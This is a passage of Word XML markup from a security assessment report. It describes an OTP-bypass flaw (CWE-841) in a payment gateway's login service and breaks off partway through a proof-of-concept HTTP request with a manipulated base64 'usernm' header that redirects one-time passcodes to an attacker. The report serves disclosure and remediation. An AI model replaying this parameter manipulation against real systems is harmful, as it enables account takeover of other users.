                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId12" w:anchor="CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="00841CE5">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>7.5</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="2F937B31" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="7DE4A189"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="4715EF8B" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-841: Improper Enforcement of Behavioral Workflow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="170583CE" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47E9DC85"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="71BDAC5C" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRDefault="004B23AC" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>paymentgateway</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>loginservices</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/v1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/account/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>otp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/send</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="148A41A8" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="00397EF0" w:rsidRDefault="004B23AC" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>paymentgateway</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>loginservices</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/v1/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>gbd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/account/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>otp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/validate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="3286902C" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="499E2B09"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="53E5D0C2" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="004B23AC" w:rsidP="004B23AC">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>The software implements an authentication technique, but it skips</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> or incorrectly validates</w:t>
            </w:r>
            <w:r w:rsidRPr="004B23AC">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> a step that weakens the technique. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>In this case, the application can be manipulated to send one time passcodes for user authentication to phone numbers and emails not associated with the users account.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="10AEF711" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F55BED3"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Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4786927F" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Issue a validation check that ensures the user has properly followed all required steps and security checks prior to allowing access to a resource or performing business functions.</w:t>
            </w:r>
            <w:r w:rsidR="00A35E16">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> Additionally, base64 data is easily reversible to identify data. As such, it’s recommended that proper encryption techniques be utilized to ensure data is not exposed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="711F857D" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2349145B"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Retest Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="459E9DFB" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00F03F96" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="2661CFAB" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61510E69" w14:textId="70A1E69E" w:rsidR="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below snippets demonstrate that the functionality used for sending and validating </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>a user’s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> one time passcode can be manipulated and bypassed. </w:t>
            </w:r>
            <w:r w:rsidR="0067330D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">To accomplish this, the </w:t>
            </w:r>
            <w:r w:rsidR="00A35E16">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>“</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="0067330D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>usernm</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00A35E16">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>” parameter</w:t>
            </w:r>
            <w:r w:rsidR="0067330D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> value of the header </w:t>
            </w:r>
            <w:r w:rsidR="00A35E16">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>can</w:t>
            </w:r>
            <w:r w:rsidR="0067330D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> be replaced with the attackers </w:t>
            </w:r>
            <w:r w:rsidR="00A35E16">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">base64 encoded </w:t>
            </w:r>
            <w:r w:rsidR="0067330D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:r w:rsidR="00A35E16">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> value</w:t>
            </w:r>
            <w:r w:rsidR="0067330D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> with the first 5 letters appended. This instructs the application to use the </w:t>
            </w:r>
            <w:r w:rsidR="002E6AAF">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>attacker’s</w:t>
            </w:r>
            <w:r w:rsidR="0067330D">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> channel (text, call, or email) instead of the logged in users. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DA2B1AD" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="00F64CC0" w:rsidRDefault="004B23AC" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F64CC0">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>HTTP Request 1:</w:t>
            </w:r>
          </w:p>
          <w:tbl>
            <w:tblPr>
              <w:tblStyle w:val="TableGrid"/>
              <w:tblW w:w="0" w:type="auto"/>
              <w:tblLayout w:type="fixed"/>
              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
            </w:tblPr>
            <w:tblGrid>
              <w:gridCol w:w="9354"/>
            </w:tblGrid>
            <w:tr w:rsidR="004B23AC" w:rsidRPr="004B23AC" w14:paraId="3E59F3C6" w14:textId="77777777" w:rsidTr="00F64CC0">
              <w:trPr>
                <w:trHeight w:val="2343"/>
              </w:trPr>
              <w:tc>
                <w:tcPr>
                  <w:tcW w:w="9354" w:type="dxa"/>
                  <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF" w:themeFill="background1" w:themeFillShade="BF"/>
                </w:tcPr>
                <w:p w14:paraId="65872A63" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>POST /</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>paymentgateway</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>loginservices</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/v1/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>gbd</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>/</w:t>
                  </w:r>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>account/</w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>otp</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>/send</w:t>
                  </w:r>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> HTTP/1.1</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="0D721194" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="004B23AC">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                    <w:t>Host: payment.sit2.va.anthem.com</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="6C1906AC" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="red"/>
                    </w:rPr>
                    <w:t>[SNIP]</w:t>
                  </w:r>
                </w:p>
                <w:p w14:paraId="1721DF43" w14:textId="77777777" w:rsidR="004B23AC" w:rsidRPr="004B23AC" w:rsidRDefault="004B23AC" w:rsidP="00F54571">
                  <w:pPr>
                    <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                    </w:rPr>
                  </w:pPr>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>usernm</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t xml:space="preserve">: </w:t>
                  </w:r>
                  <w:proofErr w:type="spellStart"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
                    <w:t>WNpbmc</w:t>
                  </w:r>
                  <w:proofErr w:type="spellEnd"/>
                  <w:r w:rsidRPr="0067330D">
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:highlight w:val="yellow"/>
                    </w:rPr>
